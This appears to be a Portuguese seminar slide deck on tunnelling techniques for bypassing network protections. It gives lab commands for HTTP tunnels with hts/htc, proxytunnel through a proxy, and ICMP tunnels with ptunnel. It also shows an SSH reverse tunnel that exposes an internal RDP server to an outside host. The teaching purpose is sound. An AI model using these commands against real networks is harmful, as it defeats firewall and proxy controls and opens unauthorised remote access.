Tunneling

2,814 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Tunneling

  1. 1. Tunneling, Bypassando Proteções• # id – Cássio Alexandre Ramos – Contatos: • Email - cassioaramos (at) gmail (dot) com • Email – cassioaramos (at) solution-rj (dot) com (dot) br • http://cassioaramos.blogspot.com • http://www.facebook.com/cassioaramos Seminário em Segurança de Redes de Computadores
  2. 2. Agenda• Introdução• Apresentação do Cenário• Exemplos• Conclusão• Debate Seminário em Segurança de Redes de Computadores
  3. 3. Apresentação do Cenário
  4. 4. Tunelamento• HTTP Tunnel - htc e hts
  5. 5. Tunelamento• HTTP Tunnel – Htc e htsNo Servidor Externoroot@bt:# hts –F localhost:22 172.16.49.130:80No cliente Internoroot@bt:# htc -P proxy:3128 -F 22 server:80root@bt:# htc -P 172.16.50.100:3128 -F 22 172.16.49.130:80root@bt:# ssh 127.0.0.1
  6. 6. Tunelamento• HTTP CONNECT Tunneling – Estabelece conexão tunelada entre o proxy e o destino – A intenção é permitir tunel SSL em portas específicas
  7. 7. Tunelamento• ProxyTunnel – bypass proxy Win2k3 SSH server 172.16.50.40 Proxy Port 443 BT4 172.16.50.129
  8. 8. Tunelamento• ProxyTunnel - proxytunnel – Servidor SSH externo escutando na porta 443No cliente internoroot@bt:# proxytunnel -a port -p proxy:3128 -d server:443root@bt:# proxytunnel -a 50 -p 172.16.50.100:3128 -d 172.16.49.130:443No cliente interno - Outra sessãoroot@bt:~# ssh -X -p 50 root@127.0.0.1root@127.0.0.1s password:
  9. 9. Tunelamento• SSH Tunnel – adm. remota
  10. 10. Tunelamento• SSH Tunnel – adm. remotaNo cliente internoroot@bt:~# ssh -C -R3389:172.16.50.40:3389 -l root 172.16.49.130No servidor externoroot@bt:~# rdesktop 127.0.0.1Autoselected keyboard map en-us
  11. 11. Tunelamento• ICMP Tunnel – ptunnel
  12. 12. Tunelamento• ICMP Tunnel – ptunnelNo Servidor Externoroot@bt:~# ptunnelNo cliente Internoroot@bt:~# ptunnel -p proxy.com -lp 8000 –da destino.com -dp 22root@bt:~# ptunnel –p 172.16.49.130 -lp 8000 –da 172.16.49.130 -dp 22root@bt:~# ssh -p 8000 localhost
  13. 13. Conclusão Seminário em Segurança de Redes de Computadores
  14. 14. DEBATE !!! Seminário em Segurança de Redes de Computadores

×